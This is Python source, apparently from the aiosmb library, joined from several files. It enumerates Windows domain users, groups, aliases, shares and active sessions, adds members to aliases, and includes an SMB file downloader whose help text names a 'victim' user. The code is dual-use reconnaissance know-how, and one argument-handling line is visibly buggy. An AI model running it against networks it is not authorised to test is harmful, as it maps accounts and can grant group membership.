	async def get_domain_sid(self, domain_name):
		try:
			resp, err = await samr.hSamrLookupDomainInSamServer(self.dce, self.handle, domain_name)
			if err is not None:
				raise err

			self.domain_ids[resp['DomainId'].formatCanonical()] = resp['DomainId']
			return resp['DomainId'].formatCanonical(), None
		except Exception as e:
			return None, e
	
	async def open_domain(self, domain_sid, access_level = samr.MAXIMUM_ALLOWED):
		try:
			resp, err = await samr.hSamrOpenDomain(self.dce, self.handle, domainId = self.domain_ids[domain_sid], desiredAccess = access_level)
			self.domain_handles[resp['DomainHandle']] = domain_sid
			return resp['DomainHandle'], None
		except Exception as e:
			return None, e
	

	async def list_domain_users(self, domain_handle):
		try:
			user_type = samr.USER_NORMAL_ACCOUNT
			status = NTStatus.MORE_ENTRIES
			enumerationContext = 0
			while status == NTStatus.MORE_ENTRIES:
				resp, err = await samr.hSamrEnumerateUsersInDomain(self.dce, domain_handle, user_type, enumerationContext=enumerationContext)
				if err is not None:
					if err.error_code != NTStatus.MORE_ENTRIES.value:
						raise err
						return
					resp = err.get_packet()

				for user in resp['Buffer']['Buffer']:
					user_sid = '%s-%s' % (self.domain_handles[domain_handle], user['RelativeId'])
					yield user['Name'], user_sid, None

				enumerationContext = resp['EnumerationContext'] 
				status = NTStatus(resp['ErrorCode'])
		except Exception as e:
			yield None, None, e

	async def list_domain_groups(self, domain_handle):
		try:
			status = NTStatus.MORE_ENTRIES
			enumerationContext = 0
			while status == NTStatus.MORE_ENTRIES:
				resp, err = await samr.hSamrEnumerateGroupsInDomain(self.dce, domain_handle, enumerationContext=enumerationContext)
				if err is not None:
					if err.error_code != NTStatus.MORE_ENTRIES.value:
						raise err
					resp = err.get_packet()

				for group in resp['Buffer']['Buffer']:
					group_sid = '%s-%s' % (self.domain_handles[domain_handle], group['RelativeId'])
					yield group['Name'], group_sid, None
				enumerationContext = resp['EnumerationContext'] 
				status = NTStatus(resp['ErrorCode'])
		except Exception as e:
			yield None, None, e
	
	async def add_member_to_alias(self, alias_handle, sid):
		try:
			resp, err = await samr.hSamrAddMemberToAlias(self.dce, alias_handle, sid)
			if err is not None:
				if err.error_code != NTStatus.MORE_ENTRIES.value:
					raise err
				resp = err.get_packet()
			status = NTStatus(resp['ErrorCode'])
			result = status == NTStatus.SUCCESS
			return result, None
		except Exception as e:
			return None, e

	async def enumerate_users(self, domain_handle):
		try:
			status = NTStatus.MORE_ENTRIES
			enumerationContext = 0
			while status == NTStatus.MORE_ENTRIES:
				resp, err = await samr.hSamrEnumerateUsersInDomain(self.dce, domain_handle,  enumerationContext=enumerationContext)
				if err is not None:
					if err.error_code != NTStatus.MORE_ENTRIES.value:
						raise err
					resp = err.get_packet()

				for user in resp['Buffer']['Buffer']:
					user_sid = '%s-%s' % (self.domain_handles[domain_handle], user['RelativeId'])
					yield user['Name'], user_sid, None
				enumerationContext = resp['EnumerationContext'] 
				status = NTStatus(resp['ErrorCode'])
		except Exception as e:
			yield None, None, e

	async def open_user(self, domain_handle, user_id, access_level = samr.MAXIMUM_ALLOWED):
		try:
			resp, err = await samr.hSamrOpenUser(self.dce, domain_handle, userId=user_id, desiredAccess = access_level)
			if err is not None:
				raise err
			self.user_handles[resp['UserHandle']] = self.domain_handles[domain_handle]
			return resp['UserHandle'], None
		except Exception as e:
			return None, e
	
	async def get_user_info(self, user_handle, userInformationClass = samr.USER_INFORMATION_CLASS.UserGeneralInformation):
		try:
			resp, err = await samr.hSamrQueryInformationUser(self.dce, user_handle, userInformationClass = userInformationClass)
			return resp, None
		except Exception as e:
			return None, e

	
	async def get_user_group_memberships(self, user_handle):
		try:
			resp, err = await samr.hSamrGetGroupsForUser(self.dce, user_handle)
			if err is not None:
				raise err
			
			for group in resp['Groups']['Groups']:
				yield '%s-%s' % (self.user_handles[user_handle], group['RelativeId']) , None
		except Exception as e:
			yield None, e

	async def list_aliases(self, domain_handle):
		try:
			status = NTStatus.MORE_ENTRIES
			enumerationContext = 0
			while status == NTStatus.MORE_ENTRIES:
				resp, err = await samr.hSamrEnumerateAliasesInDomain(self.dce, domain_handle, enumerationContext=enumerationContext)
				if err is not None:
					if err.error_code != NTStatus.MORE_ENTRIES.value:
						raise err
					resp = err.get_packet()

				for alias in resp['Buffer']['Buffer']:
					yield alias['Name'] , alias['RelativeId'], None
				
				enumerationContext = resp['EnumerationContext'] 
				status = NTStatus(resp['ErrorCode'])
		except Exception as e:
			yield None, None, e

	async def open_alias(self, domain_handle, alias_id):
		try:
			resp, err = await samr.hSamrOpenAlias(self.dce, domain_handle, aliasId=alias_id)
			if err is not None:
				raise err
			self.alias_handles[resp['AliasHandle']] = self.domain_handles[domain_handle]
			return resp['AliasHandle'], None
		except Exception as e:
			return None, e
	
	async def list_alias_members(self, alias_handle):
		try:
			resp, err = await samr.hSamrGetMembersInAlias(self.dce, alias_handle)
			if err is not None:
				raise err

			for sidr in resp['Members']['Sids']:
				yield sidr['SidPointer'].formatCanonical(), None
		except Exception as e:
			yield None, e
	
	async def get_security_info(self, handle, securityInformation = DACL_SECURITY_INFORMATION):
		try:
			resp, err = await samr.hSamrQuerySecurityObject(self.dce, handle, securityInformation)
			if err is not None:
				raise err
			return resp, None
		except Exception as e:
			return None, e


from aiosmb.wintypes.ntstatus import NTStatus

class SMBException(Exception):
	def __init__(self, message = '', ntstatus = None):
		super().__init__('%s Status: %s' % (message, ntstatus))
		self.ntstatus = ntstatus

	def pprint(self):
		if self.ntstatus is not None:
			return 'Error! Server responded with: %s' % self.ntstatus.name
		return 'Generic SMBException, missing NTSTATUS code.'

class SMBConnectionNetworkTerminated(SMBException):
	def __init__(self, msg = ''):
		if len(msg) == 0:
			super().__init__('ConnectionTerminated',-1)
		else:
			super().__init__(msg,-1)

class SMBConnectionTerminated(SMBException):
	def __init__(self, msg = ''):
		self.error_code = NTStatus.CONNECTION_ABORTED
		if len(msg) == 0:
			super().__init__('ConnectionTerminated',NTStatus.CONNECTION_ABORTED)
		else:
			super().__init__(msg,NTStatus.CONNECTION_ABORTED)

class SMBConnectionTimeoutException(SMBException):
	def __init__(self, msg = ''):
		if len(msg) == 0:
			super().__init__('ConnectionTimeout',-1)
		else:
			super().__init__(msg,-1)
	
class SMBConnectionRefusedException(SMBException):
	def __init__(self, msg = ''):
		if len(msg) == 0:
			super().__init__('ConnectionRefused',-1)
		else:
			super().__init__(msg,-1)
	
class SMBUnsupportedDialectSelected(SMBException):
	def __init__(self, msg = ''):
		if len(msg) == 0:
			super().__init__('UnsupportedDialect',-1)
		else:
			super().__init__(msg,-1)

class SMBUnsupportedDialectSign(SMBException):
	def __init__(self, msg = ''):
		if len(msg) == 0:
			super().__init__('UnsupportedDialectSign',-1)
		else:
			super().__init__(msg,-1)
	
class SMBUnsupportedSMBVersion(SMBException):
	def __init__(self, msg = ''):
		if len(msg) == 0:
			super().__init__('UnsupportedSMBVersion',-1)
		else:
			super().__init__(msg,-1)
	
class SMBKerberosPreauthFailed(SMBException):
	def __init__(self, msg = ''):
		if len(msg) == 0:
			super().__init__('KerberosPreauthFailed',-1)
		else:
			super().__init__(msg,-1)

class SMBAuthenticationFailed(SMBException):
	def __init__(self, msg = ''):
		if len(msg) == 0:
			super().__init__('SMBAuthenticationFailed',-1)
		else:
			super().__init__(msg,-1)
	
class SMBGenericException(SMBException):
	def __init__(self, msg = ''):
		if len(msg) == 0:
			super().__init__('GenericException',-1)
		else:
			super().__init__(msg,-1)
	
class SMBIncorrectShareName(SMBException):
	pass
	
class SMBCreateAccessDenied(SMBException):
	pass

class SMBPendingTimeout(SMBException):
	pass

class SMBPendingMaxRenewal(SMBException):
	pass


##### not SMBException from this point!
class SMBMachineException(Exception):
	def __init__(self, message = ''):
		super().__init__(message)

class SMBSocks5ConnectionError(Exception):
	def __init__(self, message = ''):
		super().__init__(message)




import logging
import tqdm
from aiosmb import logger
import uuid
import asyncio
from pathlib import PureWindowsPath

from aiosmb.commons.connection.factory import SMBConnectionFactory
from aiosmb.commons.interfaces.file import SMBFile


class FileTargetGen:
	def __init__(self, filename):
		self.filename = filename

	async def run(self, target_q):
		try:
			cnt = 0
			with open(self.filename, 'r') as f:
				for line in f:
					line = line.strip()
					if line == '':
						continue
					await target_q.put((str(uuid.uuid4()), line))
					await asyncio.sleep(0)
					cnt += 1
			return cnt, None
		except Exception as e:
			return cnt, e

class ListTargetGen:
	def __init__(self, targets):
		self.targets = targets

	async def run(self, target_q):
		try:
			cnt = 0
			for target in self.targets:
				cnt += 1
				target = target.strip()
				await target_q.put((str(uuid.uuid4()),target))
				await asyncio.sleep(0)
			return cnt, None
		except Exception as e:
			return cnt, e



class SMBGET:
	def __init__(self, smb_url, show_progress = False):
		self.smb_mgr = SMBConnectionFactory.from_url(smb_url)
		self.target_gens = []
		self.task_q = None
		self.__total_targets = 0
		self.target_gen_task = None
		self.show_progress = show_progress

	async def __target_gen(self):
		for target_gen in self.target_gens:
			total, err = await target_gen.run(self.task_q)
			self.__total_targets += total
			if err is not None:
				print('Target gen error! %s' % err)
			await self.task_q.put(None)

	async def run(self):
		try:
			self.task_q = asyncio.Queue()
			self.target_gen_task = asyncio.create_task(self.__target_gen())

			while True:
				t = await self.task_q.get()
				if t is None:
					return True, None
				
				tid, target = t
				unc = PureWindowsPath(target)
				file_name = unc.name
				print()
				connection = self.smb_mgr.create_connection_newtarget(target.replace('\\\\','').split('\\')[0])
				async with connection:
					_, err = await connection.login()
					if err is not None:
						raise err
					
					print(target)
					smbfile = SMBFile.from_uncpath(target)
					_, err = await smbfile.open(connection, 'r')
					if err is not None:
						logger.info('Error Downloading file %s' % target)
						continue
					
					if self.show_progress is True:
						pbar = tqdm.tqdm(desc = 'Downloading %s' % file_name, total=smbfile.size, unit='B', unit_scale=True, unit_divisor=1024)
					
					with open(file_name, 'wb') as f:
						async for data, err in smbfile.read_chunked():
							if err is not None:
								logger.info('Error Downloading file %s' % target)
								continue
							if data is None:
								break

							f.write(data)

							if self.show_progress is True:
								pbar.update(len(data))

			return True, None
		except Exception as e:
			return False, e


async def amain():
	import argparse
	import sys
	from aiosmb.commons.connection.params import SMBConnectionParams

	parser = argparse.ArgumentParser(description='SMB Share enumerator')
	SMBConnectionParams.extend_parser(parser)
	parser.add_argument('-v', '--verbose', action='count', default=0)
	parser.add_argument('-s', '--stdin', action='store_true', help='Read targets from stdin')
	parser.add_argument('-r', '--recursive', action='store_true', help='Recirsively donwload all files from the remote folder')
	parser.add_argument('--progress', action='store_true', help='Show progress')
	parser.add_argument('--url', help='Connection URL base, target can be set to anything. Owerrides all parameter based connection settings! Example: "smb2+ntlm-password://TEST\\victim@test"')
	parser.add_argument('targets', nargs='*', help = 'UNC paths of file eg. \\\\HOST\\SHARE\\file_or_folder')
	args = parser.parse_args()

	if args.verbose >=1:
		logger.setLevel(logging.DEBUG)

	if args.verbose > 2:
		print('setting deepdebug')
		logger.setLevel(1) #enabling deep debug
		asyncio.get_event_loop().set_debug(True)
		logging.basicConfig(level=logging.DEBUG)

	smb_url = None
	if args.url is not None:
		smb_url = args.smb_url
	else:
		try:
			smb_url = SMBConnectionParams.parse_args(args)
		except Exception as e:
			print('Either URL or all connection parameters must be set! Error: %s' % str(e))
			sys.exit(1)
	
	smbget = SMBGET(smb_url, show_progress=args.progress)
	
	notfile = []
	if len(args.targets) == 0 and args.stdin is True:
		smbget.target_gens.append(ListTargetGen(sys.stdin))
	else:
		for target in args.targets:
			try:
				f = open(target, 'r')
				f.close()
				smbget.target_gens.append(FileTargetGen(target))
			except:
				notfile.append(target)
	
	if len(notfile) > 0:
		smbget.target_gens.append(ListTargetGen(notfile))

	if len(smbget.target_gens) == 0:
		print('[-] No suitable targets were found!')
		return
		
	await smbget.run()

def main():
	asyncio.run(amain())

if __name__ == '__main__':
	main()



from asysocks.unicomm.common.scanner.common import *
from aiosmb.commons.connection.factory import SMBConnectionFactory
from aiosmb.commons.interfaces.machine import SMBMachine


class SMBInterfaceRes:
	def __init__(self, interface):
		self.interface = interface

	def get_header(self):
		return ['interface']

	def to_line(self, separator = '\t'):
		return self.interface

class SMBInterfaceScanner:
	def __init__(self, factory:SMBConnectionFactory):
		self.factory:SMBConnectionFactory = factory

	async def run(self, targetid, target, out_queue):
		try:
			connection = self.factory.create_connection_newtarget(target)
			async with connection:
				_, err = await connection.login()
				if err is not None:
					raise err
				
				
				machine = SMBMachine(connection)
				ifs, err = await machine.list_interfaces()
				if err is not None:
					raise err
				for iface in ifs:
					await out_queue.put(ScannerData(target, SMBInterfaceRes(iface['address'])))
				
		except Exception as e:
			await out_queue.put(ScannerError(target, e))



from aiosmb.dcerpc.v5.common.connection.smbdcefactory import SMBDCEFactory
from aiosmb.connection import SMBConnection
from aiosmb.dcerpc.v5.connection import DCERPC5Connection
from aiosmb.dcerpc.v5 import srvs
from aiosmb.wintypes.ntstatus import NTStatus
from aiosmb import logger
from aiosmb.dcerpc.v5.dtypes import NULL
from aiosmb.dcerpc.v5.rpcrt import RPC_C_AUTHN_LEVEL_NONE,\
	RPC_C_AUTHN_LEVEL_CONNECT,\
	RPC_C_AUTHN_LEVEL_CALL,\
	RPC_C_AUTHN_LEVEL_PKT,\
	RPC_C_AUTHN_LEVEL_PKT_INTEGRITY,\
	RPC_C_AUTHN_LEVEL_PKT_PRIVACY,\
	DCERPCException, RPC_C_AUTHN_GSS_NEGOTIATE
		
class SRVSRPC:
	def __init__(self):
		self.service_pipename = r'\srvsvc'
		self.service_uuid = srvs.MSRPC_UUID_SRVS
		self.service_manager = None
		
		self.dce = None
		self.handle = None
		
		self.domain_ids = {} #sid to RPC_SID
		self.domain_handles = {} #handle to sid
		
	async def __aenter__(self):
		return self
		
	async def __aexit__(self, exc_type, exc, traceback):
		await self.close()
		return True,None
	
	@staticmethod
	async def from_rpcconnection(connection:DCERPC5Connection, auth_level = None, open:bool = True, perform_dummy:bool = False):
		try:
			service = SRVSRPC()
			service.dce = connection
			
			service.dce.set_auth_level(auth_level)
			if auth_level is None:
				service.dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY) #secure default :P 
			
			_, err = await service.dce.connect()
			if err is not None:
				raise err
			
			_, err = await service.dce.bind(service.service_uuid)
			if err is not None:
				raise err
				
			return service, None
		except Exception as e:
			return False, e
	
	@staticmethod
	async def from_smbconnection(connection:SMBConnection, auth_level = None, open:bool = True, perform_dummy:bool = False):
		"""
		Creates the connection to the service using an established SMBConnection.
		This connection will use the given SMBConnection as transport layer.
		"""
		try:
			if auth_level is None:
				#for SMB connection no extra auth needed
				auth_level = RPC_C_AUTHN_LEVEL_NONE
			rpctransport = SMBDCEFactory(connection, filename=SRVSRPC().service_pipename)		
			service, err = await SRVSRPC.from_rpcconnection(rpctransport.get_dce_rpc(), auth_level=auth_level, open=open, perform_dummy = perform_dummy)	
			if err is not None:
				raise err

			return service, None
		except Exception as e:
			return None, e
	

	async def close(self):
		try:
			if self.dce:
				try:
					await self.dce.disconnect()
				except:
					pass
				return
			
			return True,None
		except Exception as e:
			return None, e
	
	async def list_shares(self, level = 1):
		try:
			level_name = 'Level%s' % level
			status = NTStatus.MORE_ENTRIES
			resumeHandle = 0
			while status == NTStatus.MORE_ENTRIES:
				resp, err = await srvs.hNetrShareEnum(self.dce, level, resumeHandle = resumeHandle)
				if err is not None:
					if err.error_code != NTStatus.MORE_ENTRIES.value:
						raise err
					resp = err.get_packet()

				for entry in resp['InfoStruct']['ShareInfo'][level_name]['Buffer']:
					yield entry['shi1_netname'][:-1], entry['shi1_type'], entry['shi1_remark'], None
				
				resumeHandle = resp['ResumeHandle'] 
				status = NTStatus(resp['ErrorCode'])
		except Exception as e:
			yield None,None,None, e
			return
	
	async def list_sessions(self, level = 10):
		try:
			if level not in [1, 10]:
				raise Exception('Only levels 1 and 10 implemented!')
			level_name = 'Level%s' % level
			status = NTStatus.MORE_ENTRIES
			resumeHandle = 0
			while status == NTStatus.MORE_ENTRIES:
				resp, err = await srvs.hNetrSessionEnum(self.dce, '\x00', NULL, level, resumeHandle = resumeHandle)
				if err is not None:
					if err.error_code != NTStatus.MORE_ENTRIES.value:
						yield None, None, err
						return
					resp = err.get_packet()

				if level == 1:
					for entry in resp['InfoStruct']['SessionInfo'][level_name]['Buffer']:
						username = entry['sesi1_username'][:-1]
						ip_addr = entry['sesi1_cname'][:-1]					
						yield username, ip_addr, None

				elif level == 10:
					for entry in resp['InfoStruct']['SessionInfo'][level_name]['Buffer']:
						username = entry['sesi10_username'][:-1]
						ip_addr = entry['sesi10_cname'][:-1]
						
						yield username, ip_addr, None
				
				resumeHandle = resp['ResumeHandle'] 
				status = NTStatus(resp['ErrorCode'])
		except Exception as e:
			yield None, None, e
			return